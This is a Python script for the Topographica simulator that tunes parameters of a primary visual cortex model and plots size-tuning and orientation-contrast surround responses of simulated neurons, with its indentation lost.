#topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
#topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
#topo.sim["V1Complex"].projections()["LocalEE"].strength=i
#topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
#topo.sim["V1Complex"].output_fns[1].t*=0
#topo.sim["V1Complex"].output_fns[1].t+=k
#topo.sim["V1ComplexInh"].output_fns[1].t*=0
#topo.sim["V1ComplexInh"].output_fns[1].t+=l
#topo.sim["V1ComplexInh"].output_fns[1].gain=m
par = "_" + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f) + "_" + str(g) + "_" + str(h) + "_" + str(i) + "_" + str(j) + "_" + str(k) + "_" + str(l)+ "_" + str(m) +".png"
plot_neural_dynamics(par)
def make_full_analysis(a,b,c,d,e,f,g,h,i,j,k,l,m):
import topo
print a,b,c,d,e,f,g,h,i,j,k,l,m
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
#topo.sim["V1Complex"].projections()["LongEE"].strength=d
#topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
#topo.sim["V1Complex"].projections()["LocalIE"].strength=f
#topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
#topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
#topo.sim["V1Complex"].projections()["LocalEE"].strength=i
#topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
#topo.sim["V1Complex"].output_fns[1].t*=0
#topo.sim["V1Complex"].output_fns[1].t+=k
#topo.sim["V1ComplexInh"].output_fns[1].t*=0
#topo.sim["V1ComplexInh"].output_fns[1].t+=l
#topo.sim["V1ComplexInh"].output_fns[1].gain=m
#topo.sim['V1Simple'].output_fns[0].old_a*=0
#topo.sim['V1Complex'].output_fns[0].old_a*=0
#topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
from topo.analysis.featureresponses import MeasureResponseCommand, FeatureMaps, SinusoidalMeasureResponseCommand,FeatureCurveCommand
FeatureMaps.num_orientation=16
MeasureResponseCommand.scale=1.0
SinusoidalMeasureResponseCommand.frequencies=[2.4]
FeatureCurveCommand.num_orientation=16
MeasureResponseCommand.duration=4.0
FeatureCurveCommand.curve_parameters=[{"contrast":40},{"contrast":50},{"contrast":90}]
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
wipe_out_activity()
clear_event_queue()
par = 'Analysis:' + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f) + "_" + str(g) + "_" + str(h) + "_" + str(i) + "_" + str(j) + "_" + str(k) + "_" + str(l) + "_" + str(m)
#d = os.path.dirname(par)
if not os.path.exists(par):
os.makedirs(par)
normalize_path.prefix = par
#plot_neural_dynamics('neural_dynamics.png')
import contrib.surround_analysis
from topo.analysis.featureresponses import SinusoidalMeasureResponseCommand,FeatureCurveCommand
from topo.base.projection import ProjectionSheet
from topo.sheet import GeneratorSheet
import contrib.jacommands
import contrib.surround_analysis
exec "from topo.analysis.vision import analyze_complexity" in __main__.__dict__
from topo.analysis.featureresponses import PatternPresenter
PatternPresenter.duration=4.0
import topo.command.pylabplot
reload(topo.command.pylabplot)
#contrib.surround_analysis.run_dynamics_analysis(0.0,0.0,0.7,__main__.__dict__.get("analysis_scale",0.3))
#PatternPresenter.duration=4.0
#a = topo.command.pylabplot.measure_or_tuning_fullfield.instance(sheet=topo.sim["V1Complex"])
#a.duration=4.0
#a()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0]",sheet=topo.sim["V1Complex"],coords=[(0,0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,0.1]",sheet=topo.sim["V1Complex"],coords=[(0.1,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,-0.1]",sheet=topo.sim["V1Complex"],coords=[(0.1,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,0.1]",sheet=topo.sim["V1Complex"],coords=[(-0.1,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,-0.1]",sheet=topo.sim["V1Complex"],coords=[(-0.1,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.2,0.2]",sheet=topo.sim["V1Complex"],coords=[(0.2,0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.2,-0.2]",sheet=topo.sim["V1Complex"],coords=[(0.2,-0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.2,0.2]",sheet=topo.sim["V1Complex"],coords=[(-0.2,0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.2,-0.2]",sheet=topo.sim["V1Complex"],coords=[(-0.2,-0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.1]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.1]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,0]",sheet=topo.sim["V1Complex"],coords=[(-0.1,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,0]",sheet=topo.sim["V1Complex"],coords=[(0.1,-0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,0.3]",sheet=topo.sim["V1Complex"],coords=[(0.3,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,-0.3]",sheet=topo.sim["V1Complex"],coords=[(0.3,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,0.3]",sheet=topo.sim["V1Complex"],coords=[(-0.3,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,-0.3]",sheet=topo.sim["V1Complex"],coords=[(-0.3,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,0.24]",sheet=topo.sim["V1Complex"],coords=[(0.25,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,-0.24]",sheet=topo.sim["V1Complex"],coords=[(0.25,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,0.24]",sheet=topo.sim["V1Complex"],coords=[(-0.25,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,-0.24]",sheet=topo.sim["V1Complex"],coords=[(-0.25,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.24]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.24]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,0]",sheet=topo.sim["V1Complex"],coords=[(-0.25,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,0]",sheet=topo.sim["V1Complex"],coords=[(0.25,-0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.3]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.3]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,0]",sheet=topo.sim["V1Complex"],coords=[(-0.3,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,0]",sheet=topo.sim["V1Complex"],coords=[(0.3,-0.0)])()
#contrib.surround_analysis.surround_analysis().analyse([(0,0),(1.0,0.0),(0.0,1.0),(-1.0,0.0),(0.0,-1.0),(1.0,1.0),(-1.0,1.0),(1.0,-1.0),(-1.0,-1.0)],12,15)
normalize_path.prefix = './D-with-lowhighcontrast'
if not os.path.exists(normalize_path.prefix):
os.makedirs(normalize_path.prefix)
contrib.surround_analysis.surround_analysis().analyse([(0,0)],12,15)
def plot_size_tuning(params):
sheet_names=["V1Complex"]
prefix="/home/jan/topographica/ActivityExploration/"
from topo.command.basic import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
import pylab
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
x = 0
y = 0.06
(X,Y) = topo.sim["V1Complex"].sheet2matrixidx(x,y)
(Xl,Yl) = topo.sim["LGNOn"].sheet2matrixidx(x,y)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#orr=numpy.pi*topo.sim["V1Complex"].sheet_views["OrientationPreference"].view()[0][X][Y]
#phase = 2*numpy.pi*topo.sim["V1Simple"].sheet_views["PhasePreference"].view()[0][X][Y]
orr =0
phase =0
stc_e_hc = []
stc_i_hc = []
stc_LongEE_hc = []
stc_LocalEE_hc = []
stc_LocalIE_hc = []
stc_Aff_hc = []
LGN_hc = []
V1S_hc = []
num_sizes = 50
max_size = 1.3
for size in xrange(0,num_sizes):
size = float(size)/num_sizes*max_size
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=orr,phase=phase,size=size,scale=1.0,x=x,y=y,frequency=2.4))
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim.run(4.0)
stc_e_hc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_i_hc.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
LGN_hc.append(topo.sim["LGNOn"].activity[Xl,Yl].copy())
V1S_hc.append(topo.sim["V1Simple"].activity[X,Y].copy())
stc_Aff_hc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_LongEE_hc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_LocalEE_hc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_LocalIE_hc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
stc_e_lc = []
stc_i_lc = []
stc_LongEE_lc = []
stc_LocalEE_lc = []
stc_LocalIE_lc = []
stc_Aff_lc = []
LGN_lc = []
V1S_lc = []
sizes=[]
for size in xrange(0,num_sizes):
size = float(size)/num_sizes*max_size
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=orr,phase=phase,size=size,scale=0.3,x=x,y=y,frequency=2.4))
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim.run(4.0)
stc_e_lc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_i_lc.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
LGN_lc.append(topo.sim["LGNOn"].activity[Xl,Yl].copy())
V1S_lc.append(topo.sim["V1Simple"].activity[X,Y].copy())
stc_Aff_lc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_LongEE_lc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_LocalEE_lc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_LocalIE_lc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
sizes.append(size)
pylab.figure(figsize=(20,15))
pylab.subplot(6,1,1)
pylab.plot(sizes,stc_e_lc,'ro',label='exc lc')
pylab.plot(sizes,stc_e_lc,'r')
pylab.plot(sizes,stc_i_lc,'bo',label='inh lc')
pylab.plot(sizes,stc_i_lc,'b')
pylab.plot(sizes,stc_e_hc,'r+',label='exc hc')
pylab.plot(sizes,stc_e_hc,'r')
pylab.plot(sizes,stc_i_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_i_hc,'b')
pylab.legend()
pylab.subplot(6,1,2)
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc)+numpy.array(stc_LocalEE_lc),'ro',label='exc lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc)+numpy.array(stc_LocalEE_lc),'r')
pylab.plot(sizes,stc_LocalIE_lc,'bo',label='ing lc')
pylab.plot(sizes,stc_LocalIE_lc,'b')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc)+numpy.array(stc_LocalEE_hc),'r+',label='exc hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc)+numpy.array(stc_LocalEE_hc),'r')
pylab.plot(sizes,stc_LocalIE_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_LocalIE_hc,'b')
pylab.legend()
pylab.subplot(6,1,3)
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc),'ro',label='exc lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc),'r')
pylab.plot(sizes,stc_LocalIE_lc,'bo',label='ing lc')
pylab.plot(sizes,stc_LocalIE_lc,'b')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc),'r+',label='exc hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc),'r')
pylab.plot(sizes,stc_LocalIE_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_LocalIE_hc,'b')
pylab.legend()
pylab.subplot(6,1,4)
pylab.plot(sizes,numpy.array(stc_Aff_lc),'ko',label='aff lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc),'k')
pylab.plot(sizes,numpy.array(stc_LongEE_lc),'kx',label='long lc')
pylab.plot(sizes,numpy.array(stc_LongEE_lc),'k')
pylab.plot(sizes,numpy.array(stc_LocalEE_lc)/10,'k*',label='local lc')
pylab.plot(sizes,numpy.array(stc_LocalEE_lc)/10,'k')
pylab.plot(sizes,numpy.array(stc_Aff_hc),'go',label='aff hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc),'g')
pylab.plot(sizes,numpy.array(stc_LongEE_hc),'gx',label='long hc')
pylab.plot(sizes,numpy.array(stc_LongEE_hc),'g')
pylab.plot(sizes,numpy.array(stc_LocalEE_hc)/10,'g*',label='local hc')
pylab.plot(sizes,numpy.array(stc_LocalEE_hc)/10,'g')
pylab.legend()
pylab.subplot(6,1,5)
pylab.plot(sizes,numpy.array(V1S_lc),'ko',label='V1S lc')
pylab.plot(sizes,numpy.array(V1S_lc),'k')
pylab.plot(sizes,numpy.array(V1S_hc),'go',label='V1S hc')
pylab.plot(sizes,numpy.array(V1S_hc),'g')
pylab.legend()
pylab.subplot(6,1,6)
pylab.plot(sizes,numpy.array(LGN_lc),'ko',label='LGN lc')
pylab.plot(sizes,numpy.array(LGN_lc),'k')
pylab.plot(sizes,numpy.array(LGN_hc),'go',label='LGN hc')
pylab.plot(sizes,numpy.array(LGN_hc),'g')
pylab.legend()
pylab.savefig(prefix+ params);
def plot_neural_dynamics(params):
sheet_names=["V1Complex"]
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=10,scale=1.0,x=0.0,y=0.0,frequency=2.4))
from topo.pattern import OrientationContrast
from topo.command import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.pattern import OrientationContrast
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
import pylab
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
prefix="/home/jan/topographica/ActivityExploration/"
topo.sim.state_push()
from topo.command import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.pattern import OrientationContrast
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
data={}
for key in sheet_names:
data[key] = {}
for i in topo.sim[key].projections().keys():
data[key][i]=[]
data[key]["act"]=[]
(X,Y) = topo.sim["V1Complex"].sheet2matrixidx(0.0,0.0)
LateralOrientationAnnisotropy()
#return
for i in xrange(0,100):
topo.sim.run(0.05)
for key in sheet_names:
for i in topo.sim[key].projections().keys():
data[key][i].append(topo.sim[key].projections()[i].activity.copy())
data[key]["act"].append(topo.sim[key].activity.copy())
acts = topo.sim["V1Simple"].activity.copy()
actc = topo.sim["V1Complex"].activity.copy()
topo.sim.state_pop()
m = numpy.argmax(data["V1Complex"]["act"][-1])
#(X,Y) = numpy.unravel_index(m, data["V1Complex"]["act"][-1].shape)
orr=numpy.pi*topo.sim["V1Complex"].sheet_views["OrientationPreference"].view()[0][X][Y]
phase = 2*numpy.pi*topo.sim["V1Complex"].sheet_views["PhasePreference"].view()[0][X][Y]
print X,Y
pylab.figure(figsize=(20,15))
pylab.subplot(5,3,1)
pylab.title(prefix+sheet_names[0]+" [" + str(X) + "," +str(Y) + "]")
for projname in data[sheet_names[0]].keys():
a = []
for act in data[sheet_names[0]][projname]:
a.append(act[X,Y])
pylab.plot(a,label=projname)
#pylab.legend(loc='upper left')
pylab.subplot(5,3,2)
pylab.imshow(acts)
pylab.colorbar()
pylab.subplot(5,3,3)
pylab.imshow(actc)
pylab.colorbar()
(xx,yy) = topo.sim["V1Complex"].matrixidx2sheet(X,Y)
# now lets collect the size tuning
step_size=0.2
stc_lc = []
stc_aff_lc = []
stc_lr_exc_lc = []
stc_sr_exc_lc = []
stc_sr_inh_lc = []
for i in xrange(0,10):
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=i*step_size,scale=0.3,x=xx,y=yy,frequency=2.4))
topo.sim.state_push()
topo.sim.run(2.0)
stc_lc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_aff_lc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_lr_exc_lc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_sr_exc_lc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_sr_inh_lc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
stc_hc = []
stc_aff_hc = []
stc_lr_exc_hc = []
stc_sr_exc_hc = []
stc_sr_inh_hc = []
for i in xrange(0,10):
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=i*step_size,scale=1.0,x=xx,y=yy,frequency=2.4))
topo.sim.state_push()
topo.sim.run(2.0)
stc_hc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_aff_hc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_lr_exc_hc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_sr_exc_hc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_sr_inh_hc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
# lets do the surround contrast analysis
cs = 0.6
scale=1.0
colinear = OrientationContrast(orientationcenter=orr,orientationsurround=orr,sizecenter=cs,sizesurround=4.0,thickness=4.0-cs,scalecenter=scale,scalesurround=scale,x=xx,y=yy,frequency=__main__.__dict__.get('FREQ',2.4),phase=phase)
orthogonal = OrientationContrast(orientationcenter=orr,orientationsurround=orr+numpy.pi/2,sizecenter=cs,sizesurround=4.0,thickness=4.0-cs,scalecenter=scale,scalesurround=scale,x=xx,y=yy,frequency=__main__.__dict__.get('FREQ',2.4),phase=phase)
ortc_or = []
ortc_aff_or = []
ortc_lr_exc_or = []
ortc_sr_exc_or = []
ortc_sr_inh_or = []
inh_ortc_or = []
inh_ortc_lr_exc_or = []
inh_ortc_sr_exc_or = []
inh_ortc_sr_inh_or = []
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim['Retina'].set_input_generator(orthogonal)
for i in xrange(0,80):
topo.sim.run(0.05)
ortc_or.append(topo.sim["V1Complex"].activity[X,Y].copy())
ortc_aff_or.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
ortc_lr_exc_or.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
ortc_sr_exc_or.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
ortc_sr_inh_or.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
inh_ortc_or.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
inh_ortc_lr_exc_or.append(topo.sim["V1ComplexInh"].projections()["LongEI"].activity[X,Y].copy())
inh_ortc_sr_exc_or.append(topo.sim["V1ComplexInh"].projections()["LocalEI"].activity[X,Y].copy())
inh_ortc_sr_inh_or.append(topo.sim["V1ComplexInh"].projections()["LocalII"].activity[X,Y].copy())
ortc_or_V1Complex_act = topo.sim["V1Complex"].activity.copy()
ortc_or_V1Simple_act = topo.sim["V1Simple"].activity.copy()
ortc_or_LGNOn_act = topo.sim["LGNOn"].activity.copy()
inh_ortc_or_V1Complex_act = topo.sim["V1ComplexInh"].activity.copy()
topo.sim.state_pop()
ortc_cl = []
ortc_aff_cl = []
ortc_lr_exc_cl = []
ortc_sr_exc_cl = []
ortc_sr_inh_cl = []
inh_ortc_cl = []
inh_ortc_lr_exc_cl = []
inh_ortc_sr_exc_cl = []
inh_ortc_sr_inh_cl = []
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim['Retina'].set_input_generator(colinear)
for i in xrange(0,80):
topo.sim.run(0.05)
ortc_cl.append(topo.sim["V1Complex"].activity[X,Y].copy())
ortc_aff_cl.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
ortc_lr_exc_cl.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
ortc_sr_exc_cl.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
ortc_sr_inh_cl.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
inh_ortc_cl.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
inh_ortc_lr_exc_cl.append(topo.sim["V1ComplexInh"].projections()["LongEI"].activity[X,Y].copy())
inh_ortc_sr_exc_cl.append(topo.sim["V1ComplexInh"].projections()["LocalEI"].activity[X,Y].copy())
inh_ortc_sr_inh_cl.append(topo.sim["V1ComplexInh"].projections()["LocalII"].activity[X,Y].copy())
ortc_cl_V1Complex_act = topo.sim["V1Complex"].activity.copy()
ortc_cl_V1Simple_act = topo.sim["V1Simple"].activity.copy()
ortc_cl_LGNOn_act = topo.sim["LGNOn"].activity.copy()
inh_ortc_cl_V1Complex_act = topo.sim["V1ComplexInh"].activity.copy()
topo.sim.state_pop()
pylab.subplot(5,3,4)
pylab.plot(stc_lc,label='act')
pylab.plot(stc_aff_lc,label='aff')
pylab.plot(stc_lr_exc_lc,label='LongEE')
pylab.plot(stc_sr_exc_lc,label='ShortEE')
pylab.plot(stc_sr_inh_lc,label='ShortIE')
pylab.plot(numpy.array(stc_sr_exc_lc)/(-1.0*numpy.array(stc_sr_inh_lc)+0.01)/10,label='E:I ratio')
pylab.xlim=(0,20)
pylab.legend()
pylab.subplot(5,3,5)
pylab.plot(stc_hc,label='act')
pylab.plot(stc_aff_hc,label='aff')
pylab.plot(stc_lr_exc_hc,label='LongEE')
pylab.plot(stc_sr_exc_hc,label='ShortEE')
pylab.plot(stc_sr_inh_hc,label='ShortIE')
pylab.plot(numpy.array(stc_sr_exc_hc)/(-1.0*numpy.array(stc_sr_inh_hc)+0.01)/10,label='E:I ratio')
pylab.xlim=(0,20)
pylab.legend()
pylab.subplot(5,3,6)
pylab.plot(stc_hc,label='act hc')
pylab.plot(stc_lc,label='act lc')
pylab.xlim=(0,20)
pylab.legend()
pylab.subplot(5,3,7)
pylab.title('collinear')
pylab.plot(ortc_cl,label='act')
pylab.plot(ortc_aff_cl,label='aff')
pylab.plot(ortc_lr_exc_cl,label='LongEE')
pylab.plot(ortc_sr_exc_cl,label='ShortEE')
pylab.plot(ortc_sr_inh_cl,label='ShortIE')
pylab.xlim=(0,60)
pylab.legend()
pylab.subplot(5,3,8)
pylab.title('orthogonal')
pylab.plot(ortc_or,label='act')
pylab.plot(ortc_aff_or,label='aff')
pylab.plot(ortc_lr_exc_or,label='LongEE')
pylab.plot(ortc_sr_exc_or,label='ShortEE')
pylab.plot(ortc_sr_inh_or,label='ShortIE')
pylab.xlim=(0,60)
pylab.legend()
pylab.subplot(5,3,9)
pylab.title('collinear inh')
pylab.plot(inh_ortc_cl,label='act')
pylab.plot(inh_ortc_lr_exc_cl,label='LongEE')
pylab.plot(inh_ortc_sr_exc_cl,label='ShortEE')
pylab.plot(inh_ortc_sr_inh_cl,label='ShortIE')
pylab.xlim=(0,60)
pylab.legend()
pylab.subplot(5,3,10)
pylab.title('orthogonal inh')
pylab.plot(inh_ortc_or,label='act')
pylab.plot(inh_ortc_lr_exc_or,label='LongEE')
pylab.plot(inh_ortc_sr_exc_or,label='ShortEE')
pylab.plot(inh_ortc_sr_inh_or,label='ShortIE')
pylab.xlim=(0,60)
pylab.legend()
pylab.subplot(5,3,11)
pylab.imshow(ortc_cl_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,12)
pylab.imshow(inh_ortc_cl_V1Complex_act,vmin=0,vmax=1.0)
#pylab.subplot(5,3,13)
#pylab.imshow(ortc_cl_LGNOn_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,13)
pylab.imshow(ortc_or_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,14)
pylab.imshow(inh_ortc_or_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,15)
pylab.imshow(ortc_or_LGNOn_act,vmin=0,vmax=1.0)
topo.sim["V1Simple"].plastic = V1Splastic
topo.sim["V1Complex"].plastic = V1Cplastic
topo.sim["V1ComplexInh"].plastic = V1CInhplastic
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(ip)
pylab.savefig(prefix+ sheet_names[0] + params);
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=0
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=0
contrib.jacommands.run_combinations(new_set_parameters,[[0.5],[0.18], [0.1] , [0.4,0.3,0.1], [1.0], [3.8,3.4,3.8,4.2,4.6,5.0], [2.4,1.8,1.2,0.6]])
#plot_size_tuning('')
#contrib.jacommands.run_combinations(check_activity,[[0],[0.1],[-2.5],[0.1],[4.0,5.0,6.0],[-1.0,-1.1],[-0.9,-0.8],[3.0],[1.7],[2.2],[0.1],[0.2,0.3]])
#make_full_analysis(0,0.1,-2.5,0.4,0.1,-8.0,-1.2,1.0,0.6,0.2,0.05,0.0,3.0)
#make_full_analysis(0,0.0,0,0,0,0,0,0,0,0,0,0,0)
#check_activity(0,0.0,0,0,0,0,0,0,0,0,0,0,0)
